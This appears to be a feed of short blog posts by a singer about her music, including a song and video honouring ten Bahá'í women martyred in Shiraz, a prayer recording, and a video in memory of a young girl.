<content type="html" xml:base="https://www.elikamahony.com/2024/39/a-song-for-10-bahai-women-of-shiraz/"><![CDATA[<p>I am happy to share a special project that I’ve had the privilege of participating in. “Ten Women of Faith” is a tribute to the 10 courageous Bahá’í women who were martyred in Iran forty years ago for refusing to recant their faith.</p>
<p>The song is composed by talented musician Bijan Khadem-Missagh and I am honoured he asked me to record vocals for the song. The piece also features two other singers, Ali Youssefi and Mona Golzar and is produced by Jarome Matthew.</p>

<p>In times of uncertainty, when the world seems to echo with questions and concerns, I find solace and comfort in the profound healing power of music. It has this incredible ability to transcend words, reaching into the depths of our emotions and offering a sense of peace.<br><br>Lately, as I reflected on sources of inspiration and hope, I stumbled upon a recording that holds a special place in my heart—a live rendition of one of a treasured prayer. This particular prayer has been a steadfast companion in gatherings, resonating deeply within me and offering a sense of peace.</p>

<p>This Earthly Plane is a new video that holds a special place in my heart. It is from my album ‘<a href="https://elikamahony.bandcamp.com/album/fire-and-gold">Fire and Gold,</a>‘ which explores the theme of tests and difficulties we encounter in life.</p>
<p>This video is in memory of Kelsey Corinne Morand, a beautiful 10 year old girl who passed away a couple of weeks ago. Kelsey loved to create constantly and I’m sure she had a hand in helping me create this video as it all came together so quickly.</p>

You ascend, see a beautiful vista, then descend, passing through a valley only to climb back up once more. In the same way our spiritual progress goes through the peaks and valleys of successes and challenges. But what is most important is that we keep on climbing… for something heavenly is in store…</p>

<p style="font-size:23px">I just released a new video titled “Ten Courageous Women” for the #OurStoryIsOne campaign in honor of the remarkable Bahá’í women who displayed unwavering bravery 40 years ago in Shiraz, Iran.</p>
<p style="font-size:23px">This video aims to shed light on the lives and sacrifices of these extraordinary individuals.</p>
